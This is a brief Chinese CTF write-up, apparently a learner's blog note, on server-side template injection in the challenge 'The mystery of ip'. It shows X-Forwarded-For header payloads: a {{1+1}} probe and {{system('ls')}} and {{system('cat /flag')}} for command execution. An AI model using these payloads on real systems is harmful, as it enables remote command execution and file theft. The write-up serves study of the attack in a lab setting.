模板引擎
理解为一段固定格式等待输入的模板文件,以此实现业务内容与视图分离,能更加清晰的编写后端逻辑。(浅看了一眼,并未具体了解,给自己挖个坑)
SSTI
同为注入类攻击,服务器接收恶意输入后未加处理便将其作为模板内容的一部分。以The mystery of ip作为例子。
根据提示,ip联想到x-forwarded-for,抓包修改后查看页面是否出现变化
1 | X-Forwarded-For: 1 |
此处之后尝试了xss无果后思路戛然而止,查看大佬博客才得知SSTI。运行尝试探测语句
1 | X-Forwarded-For: {{1+1}} |
确认存在SSTI漏洞,查看根目录文件
1 | X-Forwarded-For: {{system('ls')}} |
查看flag文件
1 | X-Forwarded-For: {{system('cat /flag')}} |
得到flag,但仍对于SSTI仍存在疑问,且对于最终回显flag两次的原因并不清楚